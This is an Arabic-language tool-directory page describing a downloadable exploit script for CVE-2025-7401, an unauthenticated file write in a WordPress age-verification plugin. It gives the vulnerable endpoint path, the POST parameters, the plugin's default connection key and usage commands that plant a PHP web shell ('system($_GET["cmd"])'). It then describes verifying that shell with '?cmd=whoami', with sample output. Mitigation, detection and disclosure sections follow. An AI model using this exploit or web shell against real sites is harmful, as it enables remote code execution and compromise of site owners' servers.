Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-7401 — Premium Age Verification / Restriction for WordPress <= 3.0.2 - قراءة وكتابة ملفات عشوائية بدون مصادقة | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-7401
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتجمع المعلوماتاختبار الاختراقالفريق الأحمر
GitHubnxploited/cve-2025-7401

CVE-2025-7401

Premium Age Verification / Restriction for WordPress <= 3.0.2 - قراءة وكتابة ملفات عشوائية بدون مصادقة

عرض المستودع
21منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-7401

التحقق من العمر / التقييد المتميز لـ WordPress <= 3.0.2 - قراءة وكتابة ملفات تعسفية بدون مصادقة

🧾 التحقق من العمر / التقييد المتميز لـ WordPress <= 3.0.2 — قراءة وكتابة ملفات تعسفية بدون مصادقة

📝 الوصف

تحتوي إضافة «التحقق من العمر / التقييد المتميز لـ WordPress» على نقطة نهاية دعم عن بُعد غير محمية بشكل كافٍ في remote_tunnel.php. في الإصدارات المتأثرة حتى 3.0.2 وما يشملها، يمكن إساءة استخدام نقطة النهاية هذه لقراءة وكتابة ملفات تعسفية بدون مصادقة. قد يؤدي الاستغلال الناجح إلى كشف معلومات حساسة أو السماح بتنفيذ تعليمات برمجية عن بُعد.

  • CVE: CVE-2025-7401
  • CVSS: 9.8 (حرج)

⚙️ نظرة عامة على السكربت

  • اسم السكربت: CVE-2025-7401.py
  • الغرض: أداة اختبار لمحترفي الأمن المصرح لهم للتحقق من سلوك كتابة الملفات في نقطة نهاية الإضافة المعرضة للخطر. يعمل السكربت على توحيد صيغة الهدف، وترميز مقتطف PHP يقدمه المستخدم، وإرسال طلب POST إلى نقطة النهاية المعرضة للخطر لمحاولة كتابة ملف، والتحقق اختياريًا من مسار الملف المتاح عبر الويب.

▶️ أمثلة سريعة على الاستخدام

root@kitploit:~
# Basic (uses default connection key and default PHP shell)
python CVE-2025-7401.py -u example.com

# Use HTTPS and custom connection key, skip verification
python CVE-2025-7401.py -u https://target.example -key YOUR_KEY --no-verify

# Custom PHP payload (authorized testing only)
python CVE-2025-7401.py -u target.com -shell '<?= system($_GET["cmd"]); ?>'

🧭 خيارات سطر الأوامر


📋 سلوك السكربت التفصيلي (خطوة بخطوة)


📌 المخرجات المتوقعة ومعناها


🛡️ التخفيف والتوصيات

  • قم بترقية الإضافة إلى إصدار مُصحح يوفره البائع فورًا.
  • قيّد الوصول إلى وظائف الدعم عن بُعد بالمصادقة وفحوصات التفويض المناسبة.
  • نظّف وتحقق من جميع مسارات الملفات ومحتويات الملفات المقدمة من المستخدم من جانب الخادم.
  • طبّق صلاحيات صارمة على نظام الملفات تمنع مستخدم الويب من إنشاء ملفات قابلة للتنفيذ في جذر الويب.
  • انشر قواعد جدار حماية تطبيقات الويب (WAF) لاكتشاف الطلبات المشبوهة الموجهة إلى remote_tunnel.php وحظرها.

🔎 الاكتشاف والأدلة الجنائية الرقمية

  • افحص سجلات خادم الويب بحثًا عن طلبات POST الموجهة إلى /wp-content/plugins/age-restriction/modules/remote_support/remote_tunnel.php مع المعاملات: action=save_file وfile وfile_content.
  • ابحث في دليل الإضافة عن ملفات غير متوقعة مثل remote_init.php.
  • ابحث عن حمولات مشفرة بـ Base64 في أجسام طلبات POST.
  • اربط الطوابع الزمنية لتغييرات الملفات بالطلبات المشبوهة.

🤝 الإفصاح المسؤول

إذا اكتشفت هذه الثغرة على بنية تحتية تابعة لجهة خارجية:

  • لا تستغل أو تعدّل الأنظمة الإنتاجية إطلاقًا.
  • تواصل مع مالك الموقع أو بائع الإضافة بشكل خاص وآمن.
  • قدّم خطوات قابلة لإعادة الإنتاج إلى البائع وامنحه وقتًا معقولًا للمعالجة قبل أي إفصاح علني.

⚖️ إشعار قانوني وسلامة

الاستخدام غير المصرح به لأدوات اختبار الثغرات غير قانوني في العديد من السلطات القضائية. هذا المستودع والسكربت مخصصان حصريًا للبحث الدفاعي والاختبار المصرح به والإفصاح المنسق عن الثغرات. احصل دائمًا على إذن كتابي صريح قبل اختبار أنظمة لا تملكها.


❗ إخلاء مسؤولية

لا يتحمل المؤلف والمساهمون أي مسؤولية عن إساءة استخدام المعلومات أو الأدوات. استخدم هذه المادة فقط ضمن الحدود القانونية والأخلاقية.


بواسطة: Nxploited ( Khaled Alenazi )

تنزيل الأداة
الخيارالنوعالافتراضيالوصف
-u, --urlstringمطلوبنطاق الهدف أو عنوان URL جزئي. سيُلحق السكربت نقطة نهاية الإضافة عند الحاجة. أمثلة: example.com, https://example.com, example.com/wp-content/plugins/age-restriction/.
-key, --keystring330489965d8266a739442ef890f57805مفتاح الاتصال المستخدم بواسطة نقطة نهاية الدعم عن بُعد. يمكن تجاوزه لأهداف المختبر إذا لزم الأمر.
-shell, --shellstring<?= system($_GET["cmd"]); ?>مقتطف PHP يتم حقنه كمحتوى الملف. غيّره فقط للاختبار المصرح به.
--no-verifyflagfalseإذا كان موجودًا، لن ينفذ السكربت التحقق الاختياري عبر GET للملف المكتوب.
الخطوةالإجراءالتفاصيل
1توحيد صيغة الإدخاليقبل إدخال المستخدم (نطاق أو مسار جزئي). يضمن وجود البروتوكول (http:// إذا كان مفقودًا)، ويزيل الشرطات المائلة المكررة، ويُلحق /wp-content/plugins/age-restriction/modules/remote_support/remote_tunnel.php إذا لم تكن نقطة النهاية موجودة.
2بناء الترويساتينشئ ترويسات طلبات HTTP واقعية (تدوير اختيار User-Agent، Accept، Referer، Content-Type).
3ترميز الحمولةيرمّز مقتطف PHP المُقدَّم بترميز Base64 ويضعه في file_content.
4طلب الاستغلال POSTيرسل connection_key وaction=save_file وfile (مسار الخادم) وfile_content إلى نقطة نهاية remote_tunnel.php المُوحَّدة عبر application/x-www-form-urlencoded.
5تحليل الاستجابةيحاول تحليل JSON من جسم الاستجابة. إذا وُجد JSON، يطبع status وfile_path؛ وإلا يطبع الاستجابة الخام المنظفة.
6التحقق (اختياري)يحاول إرسال GET إلى /wp-content/plugins/age-restriction/modules/remote_support/remote_init.php?cmd=whoami للتحقق مما إذا كان الملف المحقون متاحًا ويعيد محتواه. اختياري عبر --no-verify.
7إعداد التقريريطبع تقريرًا منظمًا وقابلًا للقراءة يتضمن نقطة النهاية المستخدمة وحالة HTTP وJSON المحلَّل (إن وُجد) وعنوان URL المتوقع للشل ومخرجات التحقق المقتطعة (إذا نجحت).
حقل المخرجاتالمعنىمثال
نقطة النهاية المستهدفةعنوان URL النهائي المُوحَّد الذي تم الاتصال به (المسار الكامل إلى remote_tunnel.php).http://example.com/wp-content/.../remote_tunnel.php
رمز حالة HTTPرمز استجابة HTTP من طلب POST. غالبًا ما يشير 200 إلى معالجة الطلب.200
حالة JSON في الاستجابةإذا أعادت نقطة النهاية JSON، فإن حقل status يبلغ عن النجاح/الفشل.valid
file_path في JSON للاستجابةالمسار من جانب الخادم الذي تعيده نقطة النهاية ويُظهر مكان كتابة الملف (للغرض المعلوماتي)./var/www/html/wp-content/.../remote_init.php
الاستجابة الخامجسم استجابة غير JSON (منظف) مثل إشعارات أو رسائل PHP.Notice: ...
عنوان URL المتوقع للشلعنوان URL العام الذي سيكون الملف المحقون متاحًا عنده. استخدمه فقط للتحقق في الاختبارات المصرح بها.http://example.com/wp-content/.../remote_init.php?cmd=whoami
حالة HTTP للتحققحالة HTTP للتحقق الاختياري عبر GET.200
جسم التحقق (مقتطع)أول N حرفًا من جسم استجابة التحقق (مفيد لرؤية مخرجات الأمر).www-data